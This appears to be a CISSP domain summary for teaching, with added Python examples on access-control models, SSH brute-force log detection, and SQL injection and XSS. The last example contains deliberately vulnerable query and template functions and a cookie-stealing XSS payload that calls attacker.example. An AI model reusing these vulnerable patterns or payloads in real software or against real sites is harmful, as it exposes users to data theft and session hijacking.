
Cissp Summary

The document outlines key domains of security and risk management, including foundational concepts, asset security, security architecture, network security, identity management, security assessment, operations, and software development security. Each domain encompasses critical topics such as risk assessment, secure design principles, authentication methods, incident response, and secure coding practices. The focus is on ensuring comprehensive security measures throughout the lifecycle of information and systems.

1. Security and Risk Management

Focuses on the foundational concepts of security, risk, compliance, and governance.

Key Topics:
o Confidentiality, Integrity, and Availability (CIA Triad)
o Security Governance and Risk Management
o Compliance and Legal/Regulatory Issues
o Risk Assessment and Risk Management
o Threat Modeling
o Business Continuity (BC) and Disaster Recovery Planning (DRP)
o Ethics and Professional Standards (e.g., (ISC)² Code of Ethics)
o Security Policies, Standards, Procedures, and Guidelines

2. Asset Security

Covers the management and protection of organizational assets throughout their lifecycle.

Key Topics:
o Classification and Ownership of Information and Assets
o Data Retention Policies
o Secure Data Handling and Disposal
o Privacy Protection
o Data Security Controls
o Storage and Media Security

3. Security Architecture and Engineering

Focuses on designing and implementing secure systems and architectures.

Key Topics:
o Secure Design Principles (e.g., Defense in Depth, Least Privilege)
o Security Models (e.g., Bell-LaPadula, Biba, Clark-Wilson)
o Cryptography Basics (encryption, hashing, digital signatures)
o Secure Hardware, Software, and Firmware Design
o Vulnerabilities and Countermeasures
o Security Architecture Frameworks
o Physical Security Design and Controls
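The Bell-LaPadula and Biba models listed above are usually memorised as slogans ("no read up, no write down" versus "no read down, no write up"). The following is an added example, not part of the original summary, that turns both into executable reference-monitor checks over a simple lattice of levels plus compartments. The level names, the compartment sets and the sample labels are my own constructed inputs; note that two labels with disjoint compartments are incomparable, so both models deny both operations between them.

```python
from dataclasses import dataclass, field
from enum import IntEnum


class Level(IntEnum):
    """Ordered sensitivity (BLP) or integrity (Biba) levels; higher is more sensitive/trusted.
    Names are a constructed example, not a standard."""
    UNCLASSIFIED = 0
    CONFIDENTIAL = 1
    SECRET = 2
    TOP_SECRET = 3


@dataclass(frozen=True)
class Label:
    """A lattice label: a level plus a set of need-to-know compartments."""
    level: Level
    compartments: frozenset = field(default_factory=frozenset)

    def dominates(self, other: "Label") -> bool:
        # L1 dominates L2 when its level is at least as high AND its compartments
        # include all of L2's. Labels with disjoint compartments are incomparable.
        return self.level >= other.level and self.compartments >= other.compartments


def blp_allows(subject: Label, obj: Label, op: str) -> bool:
    """Bell-LaPadula (confidentiality).
    read : simple security property, "no read up"   -> subject must dominate object
    write: *-property,               "no write down" -> object must dominate subject
    """
    if op == "read":
        return subject.dominates(obj)
    if op == "write":
        return obj.dominates(subject)
    raise ValueError(f"unknown operation {op!r}")


def biba_allows(subject: Label, obj: Label, op: str) -> bool:
    """Biba (integrity), the dual of BLP.
    read : simple integrity property, "no read down" -> object must dominate subject
    write: *-integrity property,      "no write up"  -> subject must dominate object
    """
    if op == "read":
        return obj.dominates(subject)
    if op == "write":
        return subject.dominates(obj)
    raise ValueError(f"unknown operation {op!r}")


# Constructed sample labels (assumptions for this example, not from the original page).
ANALYST = Label(Level.SECRET, frozenset({"nuclear"}))        # the subject
TS_REPORT = Label(Level.TOP_SECRET, frozenset({"nuclear"}))  # higher level, same compartment
PUBLIC_NOTE = Label(Level.UNCLASSIFIED)                      # lower level, no compartments
CRYPTO_MEMO = Label(Level.SECRET, frozenset({"crypto"}))     # same level, disjoint compartment

if __name__ == "__main__":
    objects = [("TS report", TS_REPORT), ("public note", PUBLIC_NOTE), ("crypto memo", CRYPTO_MEMO)]
    for name, obj in objects:
        for op in ("read", "write"):
            print(f"BLP  analyst {op:5} {name:12}: {blp_allows(ANALYST, obj, op)}")
            print(f"Biba analyst {op:5} {name:12}: {biba_allows(ANALYST, obj, op)}")
```

Running the block shows why the two models are rarely enforced on the same object at once: BLP lets the SECRET analyst write into the TOP SECRET report (blind write-up is permitted) while Biba forbids exactly that write, and the public note is readable under BLP but tainted under Biba.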

4. Communication and Network Security

Addresses the design, implementation, and management of secure communication systems and networks.

Key Topics:
o Network Protocols and Architecture
o Secure Network Design and Segmentation
o Wireless Network Security
o Remote Access and VPNs
o Network Attacks and Countermeasures
o Firewalls, IDS/IPS, and NAC
o Secure Communication Protocols (e.g., TLS, IPsec)

5. Identity and Access Management (IAM)

Focuses on ensuring proper identification, authentication, and authorization mechanisms.

Key Topics:
o Identity Management Concepts
o Authentication Methods (e.g., passwords, biometrics, MFA)
o Access Control Models (e.g., DAC, MAC, Role-Based Access Control, ABAC)
o Federated Identity Management (e.g., SSO via SAML or OpenID Connect; OAuth 2.0 for delegated authorization)
o Account and Credential Management
o Privileged Access Management (PAM)
o Identity as a Service (IDaaS)

6. Security Assessment and Testing

Covers techniques to ensure that systems are secure and operating as intended.

Key Topics:
o Security Assessment and Audit Techniques
o Vulnerability Management and Penetration Testing
o Security Testing Tools and Techniques
o Log Management and Analysis
o Reporting and Documentation of Assessment Results
o Continuous Monitoring and Metrics

7. Security Operations

Addresses operational security and incident response.

Key Topics:
o Incident Response Lifecycle
o Security Operations Center (SOC) and Threat Intelligence
o Forensics and Evidence Collection
o Logging and Monitoring
o Patch Management and Change Control
o Disaster Recovery and Business Continuity Operations
o Personnel Safety and Security (e.g., evacuation procedures)
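The log analysis topic in domain 6 and the logging and monitoring topic in domain 7 meet in the simplest SOC detection: turning raw authentication logs into an alert. The following is an added example, not part of the original summary, that parses sshd-style syslog lines and raises one alert per source address that accumulates a threshold of failed logins inside a sliding window, listing the usernames tried so an analyst can tell a single-account brute force from a password spray. The log lines are constructed, the year (RFC 3164 timestamps carry none), the threshold and the window are my assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd-style syslog lines (sample input, not from the original page).
SAMPLE_LOG = """\
Mar  3 09:12:01 bastion sshd[2201]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
Mar  3 09:12:04 bastion sshd[2203]: Failed password for root from 203.0.113.7 port 51023 ssh2
Mar  3 09:12:07 bastion sshd[2205]: Failed password for invalid user oracle from 203.0.113.7 port 51024 ssh2
Mar  3 09:12:09 bastion sshd[2207]: Failed password for root from 203.0.113.7 port 51025 ssh2
Mar  3 09:12:12 bastion sshd[2209]: Failed password for invalid user test from 203.0.113.7 port 51026 ssh2
Mar  3 09:12:15 bastion sshd[2211]: Accepted publickey for deploy from 198.51.100.12 port 40010 ssh2
Mar  3 09:30:40 bastion sshd[2301]: Failed password for alice from 198.51.100.12 port 40020 ssh2
Mar  3 09:30:55 bastion sshd[2303]: Accepted password for alice from 198.51.100.12 port 40021 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def parse_events(log_text: str, year: int = 2024) -> list:
    """Extract structured auth events; `year` is assumed because syslog omits it."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated line; in production count these to notice parser drift
        ts = datetime.strptime(f"{year} {' '.join(m['ts'].split())}", "%Y %b %d %H:%M:%S")
        events.append({"time": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]})
    return events


def detect_bruteforce(events: list, threshold: int = 5, window: timedelta = timedelta(seconds=60)) -> list:
    """One alert per source IP whose failures reach `threshold` within any `window`."""
    recent = defaultdict(deque)  # ip -> failures still inside the window
    alerts, alerted = [], set()
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["result"] != "Failed":
            continue
        q = recent[ev["ip"]]
        q.append(ev)
        while q and ev["time"] - q[0]["time"] > window:
            q.popleft()           # slide the window forward
        if len(q) >= threshold and ev["ip"] not in alerted:
            alerted.add(ev["ip"])
            alerts.append({
                "ip": ev["ip"],
                "count": len(q),
                "users": sorted({e["user"] for e in q}),  # many users -> password spray
                "first": q[0]["time"],
                "last": ev["time"],
            })
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(parse_events(SAMPLE_LOG)):
        print(f"ALERT {a['ip']}: {a['count']} failures {a['first']:%H:%M:%S}-{a['last']:%H:%M:%S}, users={a['users']}")
```

The single failure from 198.51.100.12 followed by a successful login is ordinary user error and stays below the threshold; the rule fires only for 203.0.113.7, and the four distinct usernames in the alert are the spray indicator an analyst triages first.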

8. Software Development Security

Focuses on securing applications and software development processes.

Key Topics:
o Software Development Life Cycle (SDLC) and Security Integration
o Secure Coding Practices
o Application Security Testing (e.g., SAST, DAST)
o Vulnerabilities in Web Applications (e.g., SQL Injection, XSS)
o APIs and Microservices Security
o DevSecOps Practices
o Secure Software Environments and Tools
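The two web vulnerabilities named above share one root cause: untrusted input concatenated into an interpreter's syntax. The following is an added example, not part of the original summary, that places a vulnerable lookup beside its parameterised fix for SQL injection, and a vulnerable template beside its output-encoded fix for XSS, against an in-memory SQLite table. The table, its rows, the function names and the payloads are constructed for this illustration.

```python
import html
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory table with constructed sample users (assumption for this example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    # Attacker-controlled input is spliced into the SQL text: classic injection.
    query = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str) -> list:
    # Parameterised query: the value travels separately from the statement, so
    # quotes and OR clauses inside it are data, never SQL.
    return conn.execute("SELECT username, role FROM users WHERE username = ?",
                        (username,)).fetchall()


def render_comment_vulnerable(author: str, body: str) -> str:
    # Untrusted text dropped straight into HTML: stored/reflected XSS.
    return f"<p><b>{author}</b>: {body}</p>"


def render_comment_safe(author: str, body: str) -> str:
    # Output-encode for the HTML text context; html.escape(quote=True) (the default)
    # also makes the result safe inside a quoted attribute value.
    return f"<p><b>{html.escape(author)}</b>: {html.escape(body)}</p>"


# Constructed attack inputs.
SQLI_PAYLOAD = "nobody' OR '1'='1"
XSS_PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", find_user_vulnerable(db, SQLI_PAYLOAD))   # every row leaks
    print("safe      :", find_user_safe(db, SQLI_PAYLOAD))         # no such user
    print(render_comment_vulnerable("mallory", XSS_PAYLOAD))
    print(render_comment_safe("mallory", XSS_PAYLOAD))
```

The vulnerable query becomes `... WHERE username = 'nobody' OR '1'='1'` and returns the whole table; the parameterised version looks for a literal username containing a quote and finds nothing. The same pattern applies to XSS: the fix is not to strip `<script>` but to encode for the output context, which is exactly what a DAST scanner probes for and a SAST rule flags when it sees string formatting feed a query or a template.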
